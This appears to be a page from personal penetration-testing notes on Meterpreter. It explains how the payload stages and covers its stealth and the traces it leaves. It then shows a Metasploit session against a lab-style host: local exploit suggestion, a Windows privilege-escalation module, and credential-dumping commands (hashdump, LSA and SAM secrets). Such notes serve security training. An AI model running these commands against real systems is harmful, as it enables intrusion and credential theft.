Meterpreter

Simply, it is a multi-faceted extensible payload. As powerful as it is, meterpreter runs on the victim's memory in order to facilitate our task on exploiting and accessing the target, from getting us a shell, transfer files, to doing screenshots and opening the camera of our victim. It supports staged and stageless payloads which makes it suitable for whatever we want to achieve.

Not only it gives as a shell on the victim's machine but it provides much more functionalities with great stealthiness since it doesn't create another other processes because it injects itself in a compromised process and can migrate from one process to another + the AES encryption of the communications which assures integrity of the data in question.

For a more important read check this and this.

Attack structure

  • The target executes the initial stager. This is usually a bind, reverse, findtag, passivex, etc.

  • The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.

  • The Meterpreter core initializes, establishes an AES-encrypted link over the socket, and sends a GET. Metasploit receives this GET and configures the client.

  • Lastly, Meterpreter loads extensions. It will always load stdapi and load priv if the module gives administrative rights. All of these extensions are loaded over AES encryption.

Facts and considerations

From a real life perspective, meterpreter and metasploit in general will leave traces behind, like a file or a stager that can't erase, or something of that sort. That makes it a liability and something that would ruin a pentest. Sys admins will notice that and we will definitely get caught.

Important enumeration module post/multi/recon/local_exploit_suggester

msf6 exploit(...) > search local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 34 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > exploit/windows/local/ms15_051_client_copy_images
msf6 post(multi/recon/local_exploit_suggester) > set whatever necessary
msf6 post(multi/recon/local_exploit_suggester) > run
meterpreter > hashdump
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

The Local Security Authority (LSA) in Windows manages authentication and security policies. Adversaries exploit LSA by modifying registry paths to include malicious binaries, which are executed with SYSTEM privileges during authentication package loading.

SAM in Windows stores locally cached credentials (referred to as SAM secrets).

Exploit

Checking up on the website with default creds we get a version number:

Shell

Hash Dumping

  • 1st field: username

  • 2nd field: Relative Identification (RID)

  • 3rd field: LM hash

  • 4th field: NTLM hash

If local_exploit_suggester fails, we can think of kitrap0d found in 

exploit/windows/local/ms10_015_kitrap0d
PreviousmsfvenomNextFile Transfers

Last updated